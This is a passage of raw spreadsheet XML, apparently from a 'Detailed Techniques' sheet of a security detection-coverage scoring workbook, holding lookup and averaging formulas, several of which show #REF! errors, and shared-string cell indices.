        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F129&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F129))-LEN(SUBSTITUTE(TRIM(F129),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I129" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F129&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F129))-LEN(SUBSTITUTE(TRIM(F129),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J129" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F129&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F129))-LEN(SUBSTITUTE(TRIM(F129),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K129" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L129" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F129&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F129))-LEN(SUBSTITUTE(TRIM(F129),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M129" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N129" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F129&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F129))-LEN(SUBSTITUTE(TRIM(F129),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O129" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P129" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F129&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F129))-LEN(SUBSTITUTE(TRIM(F129),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q129" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R129" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F129&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F129))-LEN(SUBSTITUTE(TRIM(F129),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S129" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T129" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F129&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F129))-LEN(SUBSTITUTE(TRIM(F129),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U129" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V129" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F129&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F129))-LEN(SUBSTITUTE(TRIM(F129),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W129" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X129" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F129&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F129))-LEN(SUBSTITUTE(TRIM(F129),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y129" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="130" spans="1:25" ht="256.5" x14ac:dyDescent="0.45">
      <c r="A130" s="8" t="s">
        <v>54</v>
      </c>
      <c r="B130" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C130" s="8" t="s">
        <v>787</v>
      </c>
      <c r="D130" s="10" t="s">
        <v>788</v>
      </c>
      <c r="E130" s="10" t="s">
        <v>789</v>
      </c>
      <c r="F130" s="10" t="s">
        <v>790</v>
      </c>
      <c r="G130" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K130,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H130" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F130&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F130))-LEN(SUBSTITUTE(TRIM(F130),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I130" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F130&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F130))-LEN(SUBSTITUTE(TRIM(F130),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J130" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F130&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F130))-LEN(SUBSTITUTE(TRIM(F130),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K130" s="51">
        <f t="shared" ref="K130:K170" si="16">FLOOR(AVERAGE(H130:J130),1)</f>
        <v>0</v>
      </c>
      <c r="L130" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F130&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F130))-LEN(SUBSTITUTE(TRIM(F130),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M130" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N130" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F130&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F130))-LEN(SUBSTITUTE(TRIM(F130),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O130" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P130" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F130&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F130))-LEN(SUBSTITUTE(TRIM(F130),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q130" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R130" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F130&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F130))-LEN(SUBSTITUTE(TRIM(F130),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S130" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T130" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F130&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F130))-LEN(SUBSTITUTE(TRIM(F130),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U130" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V130" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F130&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F130))-LEN(SUBSTITUTE(TRIM(F130),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W130" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X130" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F130&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F130))-LEN(SUBSTITUTE(TRIM(F130),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y130" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="131" spans="1:25" ht="256.5" x14ac:dyDescent="0.45">
      <c r="A131" s="8" t="s">
        <v>184</v>
      </c>
      <c r="B131" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C131" s="8" t="s">
        <v>791</v>
      </c>
      <c r="D131" s="10" t="s">
        <v>792</v>
      </c>
      <c r="E131" s="19" t="s">
        <v>793</v>
      </c>
      <c r="F131" s="10" t="s">
        <v>794</v>
      </c>
      <c r="G131" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K131,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H131" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F131&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F131))-LEN(SUBSTITUTE(TRIM(F131),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I131" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F131&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F131))-LEN(SUBSTITUTE(TRIM(F131),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J131" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F131&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F131))-LEN(SUBSTITUTE(TRIM(F131),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K131" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L131" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F131&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F131))-LEN(SUBSTITUTE(TRIM(F131),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M131" s="18" t="str">
        <f t="shared" ref="M131:M170" si="17">IF(L131&lt;0.2,"0-20",IF(L131&lt;0.4,"20-40",IF(L131&lt;0.6,"40-60",IF(L131&lt;0.8,"60-80","80-100"))))</f>
        <v>0-20</v>
      </c>
      <c r="N131" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F131&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F131))-LEN(SUBSTITUTE(TRIM(F131),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O131" s="18" t="e">
        <f t="shared" ref="O131:O170" si="18">IF(N131&lt;0.2,"0-20",IF(N131&lt;0.4,"20-40",IF(N131&lt;0.6,"40-60",IF(N131&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="P131" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F131&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F131))-LEN(SUBSTITUTE(TRIM(F131),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q131" s="18" t="e">
        <f t="shared" ref="Q131:Q170" si="19">IF(P131&lt;0.2,"0-20",IF(P131&lt;0.4,"20-40",IF(P131&lt;0.6,"40-60",IF(P131&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="R131" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F131&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F131))-LEN(SUBSTITUTE(TRIM(F131),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S131" s="18" t="e">
        <f t="shared" ref="S131:S170" si="20">IF(R131&lt;0.2,"0-20",IF(R131&lt;0.4,"20-40",IF(R131&lt;0.6,"40-60",IF(R131&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="T131" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F131&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F131))-LEN(SUBSTITUTE(TRIM(F131),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U131" s="18" t="e">
        <f t="shared" ref="U131:U170" si="21">IF(T131&lt;0.2,"0-20",IF(T131&lt;0.4,"20-40",IF(T131&lt;0.6,"40-60",IF(T131&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="V131" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F131&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F131))-LEN(SUBSTITUTE(TRIM(F131),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W131" s="18" t="e">
        <f t="shared" ref="W131:W170" si="22">IF(V131&lt;0.2,"0-20",IF(V131&lt;0.4,"20-40",IF(V131&lt;0.6,"40-60",IF(V131&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="X131" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F131&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F131))-LEN(SUBSTITUTE(TRIM(F131),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y131" s="18" t="e">
        <f t="shared" ref="Y131:Y170" si="23">IF(X131&lt;0.2,"0-20",IF(X131&lt;0.4,"20-40",IF(X131&lt;0.6,"40-60",IF(X131&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="132" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A132" s="8" t="s">
        <v>49</v>
      </c>
      <c r="B132" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C132" s="25" t="s">
        <v>795</v>
      </c>
      <c r="D132" s="10" t="s">
        <v>796</v>
      </c>
      <c r="E132" s="10" t="s">
        <v>797</v>
      </c>
      <c r="F132" s="10" t="s">
        <v>798</v>
      </c>
      <c r="G132" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K132,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H132" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F132&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F132))-LEN(SUBSTITUTE(TRIM(F132),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I132" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F132&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F132))-LEN(SUBSTITUTE(TRIM(F132),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J132" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F132&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F132))-LEN(SUBSTITUTE(TRIM(F132),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K132" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L132" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F132&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F132))-LEN(SUBSTITUTE(TRIM(F132),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M132" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N132" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F132&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F132))-LEN(SUBSTITUTE(TRIM(F132),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O132" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P132" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F132&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F132))-LEN(SUBSTITUTE(TRIM(F132),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q132" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R132" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F132&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F132))-LEN(SUBSTITUTE(TRIM(F132),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S132" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T132" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F132&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F132))-LEN(SUBSTITUTE(TRIM(F132),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U132" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V132" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F132&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F132))-LEN(SUBSTITUTE(TRIM(F132),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W132" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X132" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F132&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F132))-LEN(SUBSTITUTE(TRIM(F132),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y132" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="133" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A133" s="8" t="s">
        <v>68</v>
      </c>
      <c r="B133" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C133" s="8" t="s">
        <v>799</v>
      </c>
      <c r="D133" s="9" t="s">
        <v>800</v>
      </c>
      <c r="E133" s="19" t="s">
        <v>801</v>
      </c>
      <c r="F133" s="10" t="s">
        <v>802</v>
      </c>
      <c r="G133" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K133,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H133" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F133&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F133))-LEN(SUBSTITUTE(TRIM(F133),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I133" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F133&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F133))-LEN(SUBSTITUTE(TRIM(F133),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J133" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F133&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F133))-LEN(SUBSTITUTE(TRIM(F133),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K133" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L133" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F133&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F133))-LEN(SUBSTITUTE(TRIM(F133),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M133" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N133" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F133&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F133))-LEN(SUBSTITUTE(TRIM(F133),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O133" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P133" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F133&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F133))-LEN(SUBSTITUTE(TRIM(F133),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q133" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R133" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F133&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F133))-LEN(SUBSTITUTE(TRIM(F133),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S133" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T133" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F133&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F133))-LEN(SUBSTITUTE(TRIM(F133),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U133" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V133" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F133&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F133))-LEN(SUBSTITUTE(TRIM(F133),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W133" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X133" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F133&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F133))-LEN(SUBSTITUTE(TRIM(F133),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y133" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="134" spans="1:25" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A134" s="8" t="s">
        <v>119</v>
      </c>
      <c r="B134" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C134" s="25" t="s">
        <v>803</v>
      </c>
      <c r="D134" s="10" t="s">
        <v>804</v>
      </c>
      <c r="E134" s="10" t="s">
        <v>805</v>
      </c>
      <c r="F134" s="10" t="s">
        <v>600</v>
      </c>
      <c r="G134" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K134,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H134" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F134&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F134))-LEN(SUBSTITUTE(TRIM(F134),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I134" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F134&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F134))-LEN(SUBSTITUTE(TRIM(F134),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J134" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F134&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F134))-LEN(SUBSTITUTE(TRIM(F134),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K134" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L134" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F134&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F134))-LEN(SUBSTITUTE(TRIM(F134),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M134" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N134" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F134&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F134))-LEN(SUBSTITUTE(TRIM(F134),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O134" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P134" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F134&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F134))-LEN(SUBSTITUTE(TRIM(F134),",",""))+1)</f>
        <v>#REF!</v>
      </c>
